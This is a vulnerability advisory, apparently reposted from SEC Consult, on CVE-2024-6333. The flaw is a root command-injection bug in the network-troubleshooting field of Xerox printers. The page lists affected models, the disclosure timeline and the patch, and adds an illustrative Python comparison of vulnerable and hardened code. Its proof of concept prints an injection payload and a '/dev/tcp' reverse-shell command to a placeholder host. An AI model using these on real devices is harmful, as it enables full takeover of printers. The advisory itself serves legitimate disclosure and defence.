## https://sploitus.com/exploit?id=PACKETSTORM:182371
SEC Consult Vulnerability Lab Security Advisory < 20241023-0 >  
=======================================================================  
title: Authenticated Remote Code Execution  
product: Multiple Xerox printers  
(EC80xx, AltaLink, VersaLink, WorkCentre)  
vulnerable version: see vulnerable versions below  
fixed version: see solution section below  
CVE number: CVE-2024-6333  
impact: high  
homepage: https://xerox.com  
found: 2023-12-14  
by: Timo Longin (Office Vienna)  
Tamas Jos (Office Zurich)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"We are a global leader in office and production print technology and related  
solutions, with a large and growing presence in Digital and IT Services.  
Having redefined the workplace experience for more than 100 years, our  
differentiated business and technology offerings are empowering client success  
today by addressing the productivity challenges of a hybrid workplace and  
distributed workforce."  
  
Source: https://investors.xerox.com/  
  
  
Business recommendation:  
------------------------  
SEC Consult recommends that Xerox customers install the latest updates and review  
the vendor's security note for further information.  
  
Also make sure to have patches from previous security notes installed, such as  
XRX23-020. SEC Consult has re-identified some critical 0-days (unauthenticated RCE,  
partial authentication bypass) that were already patched but not clearly  
communicated in the previous security notes.  
  
SEC Consult highly recommends performing a thorough security review of the product,  
conducted by security professionals, to identify and resolve potential further  
security issues.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Authenticated Remote Code Execution (RCE) (CVE-2024-6333)  
An attacker authenticated as a user with administrative access to the web  
interface of a range of affected Xerox printers can exploit a remote code  
execution (RCE) vulnerability to run commands as the root user. It allows the  
attacker to execute commands directly on the operating system of the printer  
with root permissions. Consequently, the target Xerox printer can be fully  
compromised.  
  
  
Proof of concept:  
-----------------  
1) Authenticated Remote Code Execution (RCE) (CVE-2024-6333)  
The "Network Troubleshooting" menu enables administrators to configure and run  
network troubleshooting sessions based on the tcpdump tool. The web interface  
allows applying custom filters, such as an IPv4 address or specific network  
services, as seen in the image (figure 1) below.  
  
<img Network_Troubleshooting.png>  
  
Due to insufficient input validation of the IPv4 address value, an attacker  
can inject further OS commands into the final tcpdump command string, which is  
evaluated by a shell. For example, by setting the IPv4 address to the value  
"0.0.0.0$(bash $TMP~cmd)", the commands stored under "/tmp/~cmd" are executed  
when a network troubleshooting session is started.  
  
Note: The payload in the IPv4 address must bypass a character filter,  
and was kept simple for demonstration purposes. Other payloads that directly  
execute commands without requiring the "/tmp/~cmd" file exist and can be  
crafted.  
  
An attacker who, for example, has previously exploited the unauthenticated  
RCE vulnerability (fixed with Xerox Security Bulletin XRX23-020) can plant  
the following command for a reverse shell into "/tmp/~cmd":  
  
-------------------------------------------------------------------------------  
  
bash -i >/dev/tcp/X.X.X.X/10004 0>&1 2>&1  
  
-------------------------------------------------------------------------------  
  
Since the network troubleshooting service runs tcpdump with root permissions,  
full root access to the affected Xerox printers can be obtained this way.  
See figure 2 below.  
  
<img reverse_shell.png>  
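  
The following is an added illustration written for this page; it is not Xerox  
firmware code and not part of the original advisory. It models the root cause  
described above (an IPv4 field interpolated into a shell-evaluated tcpdump  
command line, protected only by a character blocklist) next to a hardened  
variant. The blocklist contents are an assumption: the advisory states only  
that "a character filter" exists and that the payload was crafted to pass it.  
"echo" stands in for tcpdump so the example runs on any Linux/macOS host  
without packet capture privileges.  
  
```python
"""Added example (not Xerox's code): shell-interpolated IPv4 filter vs. a
hardened variant. The blocklist is a hypothetical stand-in for the filter
mentioned in the advisory; its real rules are not public."""
import ipaddress
import subprocess

# ASSUMPTION: a blocklist that rejects the obvious separators and "/",
# but lets "$", "(", ")" and "~" through, so $(...) substitution survives
# and "$TMP~cmd" can stand in for a path that contains no slash.
BLOCKED = set(";|&`/\\\n<>'\"")


def naive_filter(value: str) -> bool:
    """True if the value passes the (inadequate) blocklist filter."""
    return not any(ch in BLOCKED for ch in value)


def build_cmd_vulnerable(ipv4: str) -> str:
    """Vulnerable pattern: the field is spliced into a single command
    string that is later handed to a shell. 'echo' replaces tcpdump."""
    if not naive_filter(ipv4):
        raise ValueError("blocked character in IPv4 filter")
    return f"echo tcpdump -i eth0 -n host {ipv4}"


def run_vulnerable(ipv4: str) -> str:
    """Run the command string through sh -c, exactly the step at which
    $(...) inside the 'address' is expanded before tcpdump ever runs."""
    cmd = build_cmd_vulnerable(ipv4)
    out = subprocess.run(["sh", "-c", cmd], capture_output=True,
                         text=True, check=True)
    return out.stdout.strip()


def build_argv_hardened(ipv4: str) -> list:
    """Hardened pattern: parse the field as an IPv4 address (a type-level
    allowlist) and emit a discrete argv element; no shell is involved."""
    try:
        addr = ipaddress.IPv4Address(ipv4)
    except ValueError as exc:
        raise ValueError(f"not an IPv4 address: {ipv4!r}") from exc
    return ["tcpdump", "-i", "eth0", "-n", "host", str(addr)]


def run_hardened(ipv4: str) -> str:
    """Execute the argv form. 'echo' is prepended as the stand-in binary;
    the arguments reach the child process unexpanded."""
    argv = build_argv_hardened(ipv4)
    out = subprocess.run(["echo", *argv], capture_output=True,
                         text=True, check=True)
    return out.stdout.strip()


if __name__ == "__main__":
    # Constructed payloads mirroring the advisory's shape.
    slash_payload = "0.0.0.0$(bash /tmp/~cmd)"   # blocked by the "/" rule
    tmp_payload = "0.0.0.0$(bash $TMP~cmd)"      # passes the blocklist
    demo_payload = "0.0.0.0$(echo INJECTED)"     # harmless, runs anywhere
    print("filter blocks slash payload:", not naive_filter(slash_payload))
    print("filter passes $TMP payload: ", naive_filter(tmp_payload))
    print("vulnerable output:", run_vulnerable(demo_payload))
    print("hardened output:  ", run_hardened("10.0.0.5"))
    try:
        run_hardened(demo_payload)
    except ValueError as e:
        print("hardened rejects:", e)
```
  
The vulnerable path prints "INJECTED" because sh expands the substitution  
before the (stand-in) tcpdump receives its arguments; the hardened path never  
reaches a shell and refuses anything that does not parse as an address, so the  
blocklist becomes irrelevant. The same argv-and-parse approach applies to the  
service-name filters the page mentions, using an allowlist of known services.  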
  
  
Vulnerable versions:  
--------------------  
The following products and versions were tested initially. According to the  
vendor, they were not patched to the latest version; hence the other critical  
security issues we identified were removed from this advisory.  
* Xerox Workcentre 7970 (073.200.167.09610)  
* Xerox Workcentre 7855 (073.040.167.09610)  
  
According to the vendor, the following products are affected:  
  
* AltaLink® B8045 / B8055 / B8065 / B8075 / B8090 (<103.xxx.024.18600 866140v3)  
* AltaLink® C8030 / C8035 / C8045 / C8055 / C8070 (<103.xxx.024.18600 866140v3)  
* Xerox® EC8036 / EC8056 (<103.xxx.024.18600 872818v3)  
* Xerox® EC8036 / EC8056 - Common Criteria (June 2022) (<103.023.031.35105 878257v3)  
* Xerox® EC8036 / EC8056 - Common Criteria (June 2024) (<103.xxx.013.14115 869823v3)  
* AltaLink®C8130 / C8135 / C8145 / C8155 / C8170 - Common Criteria (Aug 2024) (<119.xxx.023.13006 869829v3)  
* AltaLink® B8145 / B8155 / B8170 - Common Criteria (Aug 2024) (<119.xxx.023.13006 869829v3)  
* AltaLink® C8130 / C8135 / C8145 / C8155 / C8170 - Common Criteria Certified (Aug 2023) (<111.xxx.003.11600 869827v3)  
* AltaLink® B8145 / B8155 / B8170 - Common Criteria Certified (Aug 2023) (<111.xxx.003.11600 869827v3)  
* VersaLink® B625 / C625 - Common Criteria Certified (2024) (<119.xxx.003.11705 869818v3)  
* VersaLink® B415 / C415 - Common Criteria Certified (2024) (<119.xxx.003.11705 869818v3)  
* WorkCentre 3655/3655i (<075.060.004.07810 via Upgrade Tool)  
* WorkCentre 5945/55i (<075.091.004.07810 via Upgrade Tool)  
* WorkCentre 6655/6655i (<075.110.004.07810 via Upgrade Tool)  
* WorkCentre 7220/7225i (<075.030.004.07810 via Upgrade Tool)  
* WorkCentre 7830/7835i (<075.010.004.07810 via Upgrade Tool)  
* WorkCentre 7845/7855i (<075.040.004.07810 via Upgrade Tool)  
* WorkCentre 7845/7855 (IBG) (<075.080.004.07810 via Upgrade Tool)  
* WorkCentre 7970/7970i (<075.200.004.07810 via Upgrade Tool)  
* WorkCentre EC7836 (<075.050.004.07810 via Upgrade Tool)  
* WorkCentre EC7856 (<075.020.004.07810 via Upgrade Tool)  
  
  
Vendor contact timeline:  
------------------------  
2024-02-05: Contacting vendor through the Xerox Security Response Center (XSRC)  
https://forms.business.xerox.com/en-us/xerox-security-response-center/  
2024-02-06: Xerox assigns case id XSRC-2024-0003  
2024-02-08: Xerox provides links for the current firmware versions to confirm  
whether the issues can be reproduced.  
2024-02-27: Xerox asks for status update.  
2024-02-28: The authenticated RCE was confirmed to be exploitable in the current  
firmware versions (075.040.013.29000 and 075.200.013.29000). The other  
two reported issues (unauthenticated RCE and partial authentication  
bypass) are already fixed in the most recent versions.  
2024-03-19: Xerox requests more information on provided PoCs.  
2024-04-02: SEC Consult provides the requested information.  
2024-04-18: SEC Consult asks for updates on the vulnerability status.  
2024-05-06: Xerox provides an update/patch for the affected WorkCentre 7970 and 7855  
series.  
2024-05-16: SEC Consult asks about a CVE number for the authenticated RCE  
vulnerability. SEC Consult also inquires about further plans for  
confirming which models and versions are potentially affected by the  
partial authentication bypass and pre-authenticated RCE  
vulnerabilities.  
2024-05-21: Xerox states that they are evaluating other models. Also, they request  
a CVSS score and vector for the authenticated RCE. Furthermore, more  
details on the public disclosure timeline are requested.  
2024-05-23: SEC Consult provides the requested information.  
2024-06-03: Status update from Xerox regarding the CVE-ID request. Furthermore,  
more information on the advisory to be released is requested.  
2024-06-06: Status update from Xerox regarding the CVE-ID request.  
2024-06-10: Xerox again requests a CVSS score and vector for the authenticated RCE.  
2024-06-14: SEC Consult again provides the CVSS score and vector. Also, information  
on the advisory to be released is provided.  
2024-06-25: Xerox provides CVE-2024-6333 for the authenticated RCE vulnerability.  
2024-06-28: Informing Xerox about longer vacation period / absence.  
Asking again about further affected models.  
2024-07-01: Xerox: Further models are affected, will be shared in the final publication.  
2024-07-16: Xerox asks for our publication draft.  
2024-07-31: Xerox asks again for our publication draft.  
2024-07-31: SEC Consult reminds Xerox about the vacation period and references the draft  
advisory already sent a few months ago. Asking whether the other models are  
affected by the authenticated RCE only, or by the other identified  
vulnerabilities as well.  
2024-08-28: Xerox provides high-level summary of the case, but no details on affected  
models.  
2024-10-03: SEC Consult provides an updated advisory with minor changes to Xerox,  
again asking whether other versions and models are affected by the  
described vulnerabilities.  
2024-10-07: Xerox provides further information on the partial authentication bypass  
and pre-authenticated RCE vulnerabilities, showing that these have been  
addressed in previous patches. Also, further coordination regarding  
Xerox' Security Bulletin Release.  
2024-10-16: Release of Xerox Security Bulletin XRX24-015, covering the authenticated  
RCE vulnerability.  
2024-10-21: Sending latest advisory draft to Xerox, setting release date to 23rd October.  
Asking Xerox whether the security bulletin XRX23-020  
(https://securitydocs.business.xerox.com/wp-content/uploads/2023/11/XRX23-020_Security-Bulletin-for-AltaLink-VersaLink-and-WorkCentre-1.pdf)  
is the correct one for the other issues and why there is no mention of  
our pre-auth RCE there.  
Xerox responds with the link to the latest XRX24-015 bulletin and that  
our advisory is fine.  
2024-10-23: Coordinated release of advisory.  
  
  
Solution:  
---------  
Xerox provided patches for the affected printers. More information can be found  
in Xerox' Security Bulletin XRX24-015:  
  
https://securitydocs.business.xerox.com/wp-content/uploads/2024/10/Xerox-Security-Bulletin-XRX24-015-for-Altalink-Versalink-and-WorkCentre-%E2%80%93-CVE-2024-6333-.pdf  
  
  
Workaround:  
-----------  
None  
  
  
Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF Timo Longin, Tamas Jos / @2024